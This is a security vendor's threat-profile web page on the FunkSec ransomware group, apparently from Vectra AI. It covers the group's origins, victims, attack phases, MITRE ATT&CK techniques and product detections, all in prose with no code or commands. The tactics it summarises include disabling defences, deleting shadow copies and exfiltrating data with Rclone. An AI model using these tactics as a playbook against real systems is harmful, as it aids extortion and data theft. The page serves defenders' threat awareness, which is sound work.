Cyberattack Bulletin: Defending Against Codefinger Ransomware in AWS S3 >

Cyberattack Bulletin:  Defending Against Codefinger Ransomware in AWS S3 >

Vectra AI Japan、ITR発行の最新レポート内「NDR市場」にて国内トップシェアを獲得
詳細を見る
Hamburger icon top line
Hamburger icon middle line
Hamburger icon bottom line
Threat actors
>
Ransomware Group

FunkSec

FunkSec represents a new wave of AI-assisted ransomware groups, blending cybercrime with hacktivism. While their technical sophistication is questionable, their tactics and public visibility make them a notable threat. Security teams should monitor AI-driven malware trends and prepare for ransomware attacks leveraging automation and deception tactics.

Detect FunkSec's TTPs
Is Your Organization Safe From FunkSec?
Background
Targets
TTPs
Detection
FAQs
Watch Threat Briefing

FunkSec's Background

FunkSec is a ransomware group that emerged in late 2024, rapidly gaining notoriety for its high number of publicly claimed victims. Unlike other established ransomware gangs, FunkSec appears to be a relatively new and independent operation, with no known ties to previous ransomware families. The group utilizes double extortion tactics, combining data encryption with data theft to pressure victims into paying ransoms.

A key characteristic of FunkSec is its AI-assisted malware development, allowing even inexperienced actors to rapidly create and iterate on malicious tools. The group appears to operate at the intersection of hacktivism and cybercrime, making it difficult to determine their true motivations. Some of their leaked datasets were found to be recycled from previous hacktivist campaigns, casting doubt on the authenticity of their disclosures.

While FunkSec presents itself as a sophisticated ransomware-as-a-service (RaaS) operation, security researchers have identified multiple signs indicating that the group's technical expertise is limited. Most of their activities seem to be driven by a desire for notoriety rather than financial gain, as evidenced by their low ransom demands and public promotional efforts on cybercrime forums.

Source: Checkpoint

FunkSec's Background
Targets

FunkSec's Targets

Targeted Countries

The majority of FunkSec's claimed victims have been from India and the United States, with additional attacks targeting European and Middle Eastern organizations. Their alignment with the "Free Palestine" movement suggests a possible geopolitical motivation, though this may be more about branding than actual political intent.

Targeted Industries

FunkSec does not appear to focus on a single industry but has attacked government institutions, healthcare, financial services, and technology companies. The group's ransomware-as-a-service (RaaS) model allows multiple affiliates to use their tools, broadening their scope of potential victims. Some targeted industries align with hacktivist motives, particularly government agencies and infrastructure.

Image source: PCrisk

Targeted Industries

FunkSec does not appear to focus on a single industry but has attacked government institutions, healthcare, financial services, and technology companies. The group's ransomware-as-a-service (RaaS) model allows multiple affiliates to use their tools, broadening their scope of potential victims. Some targeted industries align with hacktivist motives, particularly government agencies and infrastructure.

Image source: PCrisk

Notable Victims

An estimated 138 organizations have fallen prey to FunkSec attacks.

Attack Method

FunkSec's attack method

Initial Access
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Execution
Exfiltration
Impact
A shadowy figure casting a wide net over a digital landscape filled with various devices such as computers, smartphones, and tablets. The net symbolizes the attacker's attempts to find vulnerabilities or use phishing techniques to gain unauthorized access.

FunkSec gains access through phishing emails, credential stuffing, and exploiting unpatched vulnerabilities in exposed systems. They also leverage stolen credentials found in dark web forums.

A digital ladder extending upwards from a basic user icon towards a crown symbolizing administrative privileges. This represents the attacker's efforts to gain higher-level access within the system.

The group attempts to escalate privileges using credential theft techniques, token manipulation, and exploiting misconfigurations in Windows environments.

A chameleon blending into a digital background, with zeroes and ones flowing around it. This represents the attacker's ability to avoid detection by security measures, changing tactics to blend in with normal network traffic.

FunkSec disables Windows Defender, event logging, and PowerShell security features to avoid detection. Their ransomware is compiled in Rust, which can make analysis and detection more difficult.

A thief with a lockpick toolkit working on a giant keyhole shaped like a login form, representing the attacker's efforts to steal user credentials to gain unauthorized access.

They deploy keyloggers and password-scraping tools like funkgenerate, which gathers credentials from compromised systems and websites.

A magnifying glass moving over a digital map of a network, highlighting files, folders, and network connections. This image represents the phase where attackers explore the environment to understand the structure and where valuable data resides.

FunkSec scans infected networks to locate valuable files and determine the most critical assets to encrypt.

A series of interconnected nodes with a shadowy figure moving stealthily between them. This illustrates the attacker's movements within the network, seeking to gain control of additional systems or spread malware.

They use HVNC (hidden virtual network computing) tools and remote desktop exploits to move across compromised networks.

A large vacuum sucking up files, data icons, and folders into a bag held by a shadowy figure. This image symbolizes the process of gathering valuable data from the target network.

The group exfiltrates sensitive files using custom Python scripts and standard tools like Rclone before encrypting the victim’s data.

A command prompt window open in front of a digital background, with malicious code being typed out. This represents the phase where attackers execute their malicious payload within the compromised system.

The Rust-based ransomware encrypts files using ChaCha20 encryption, appends the “.funksec” extension, and drops a ransom note.

A series of files being funneled through a covert channel out of a computer to a cloud labeled with a skull, symbolizing the unauthorized transfer of data to a location controlled by the attacker.

Stolen data is uploaded to FunkSec’s dark web leak site, where it is either publicly released or sold to third parties.

A cracked screen with a digital cityscape in chaos behind it, symbolizing the destructive impact of the cyberattack, such as service disruption, data destruction, or financial loss.

The ransomware deletes shadow copies, disrupts operations by terminating processes, and changes system settings (e.g., blacking out the desktop background).

A shadowy figure casting a wide net over a digital landscape filled with various devices such as computers, smartphones, and tablets. The net symbolizes the attacker's attempts to find vulnerabilities or use phishing techniques to gain unauthorized access.
Initial Access

FunkSec gains access through phishing emails, credential stuffing, and exploiting unpatched vulnerabilities in exposed systems. They also leverage stolen credentials found in dark web forums.

A digital ladder extending upwards from a basic user icon towards a crown symbolizing administrative privileges. This represents the attacker's efforts to gain higher-level access within the system.
Privilege Escalation

The group attempts to escalate privileges using credential theft techniques, token manipulation, and exploiting misconfigurations in Windows environments.

A chameleon blending into a digital background, with zeroes and ones flowing around it. This represents the attacker's ability to avoid detection by security measures, changing tactics to blend in with normal network traffic.
Defense Evasion

FunkSec disables Windows Defender, event logging, and PowerShell security features to avoid detection. Their ransomware is compiled in Rust, which can make analysis and detection more difficult.

A thief with a lockpick toolkit working on a giant keyhole shaped like a login form, representing the attacker's efforts to steal user credentials to gain unauthorized access.
Credential Access

They deploy keyloggers and password-scraping tools like funkgenerate, which gathers credentials from compromised systems and websites.

A magnifying glass moving over a digital map of a network, highlighting files, folders, and network connections. This image represents the phase where attackers explore the environment to understand the structure and where valuable data resides.
Discovery

FunkSec scans infected networks to locate valuable files and determine the most critical assets to encrypt.

A series of interconnected nodes with a shadowy figure moving stealthily between them. This illustrates the attacker's movements within the network, seeking to gain control of additional systems or spread malware.
Lateral Movement

They use HVNC (hidden virtual network computing) tools and remote desktop exploits to move across compromised networks.

A large vacuum sucking up files, data icons, and folders into a bag held by a shadowy figure. This image symbolizes the process of gathering valuable data from the target network.
Collection

The group exfiltrates sensitive files using custom Python scripts and standard tools like Rclone before encrypting the victim’s data.

A command prompt window open in front of a digital background, with malicious code being typed out. This represents the phase where attackers execute their malicious payload within the compromised system.
Execution

The Rust-based ransomware encrypts files using ChaCha20 encryption, appends the “.funksec” extension, and drops a ransom note.

A series of files being funneled through a covert channel out of a computer to a cloud labeled with a skull, symbolizing the unauthorized transfer of data to a location controlled by the attacker.
Exfiltration

Stolen data is uploaded to FunkSec’s dark web leak site, where it is either publicly released or sold to third parties.

A cracked screen with a digital cityscape in chaos behind it, symbolizing the destructive impact of the cyberattack, such as service disruption, data destruction, or financial loss.
Impact

The ransomware deletes shadow copies, disrupts operations by terminating processes, and changes system settings (e.g., blacking out the desktop background).

MITRE ATT&CK Mapping

FunkSec's TTPs

TA0001: Initial Access
T1566
Phishing
T1190
Exploit Public-Facing Application
TA0002: Execution
T1204
User Execution
TA0003: Persistence
No items found.
TA0004: Privilege Escalation
T1134
Access Token Manipulation
T1068
Exploitation for Privilege Escalation
TA0005: Defense Evasion
T1134
Access Token Manipulation
T1070
Indicator Removal
T1562
Impair Defenses
TA0006: Credential Access
T1110
Brute Force
T1003
OS Credential Dumping
TA0007: Discovery
T1082
System Information Discovery
T1046
Network Service Discovery
TA0008: Lateral Movement
T1021
Remote Services
TA0009: Collection
No items found.
TA0011: Command and Control
No items found.
TA0010: Exfiltration
T1567
Exfiltration Over Web Service
TA0040: Impact
T1490
Inhibit System Recovery
T1486
Data Encrypted for Impact
Platform Detections

How to detect FunkSec with Vectra AI

Ransomware File Activity

Suspicious Port Scan

Suspicious Remote Desktop Protocol

View more detections
Assess your attack exposure

FAQs

Is Your Organization Safe From FunkSec?

Assess your attack exposure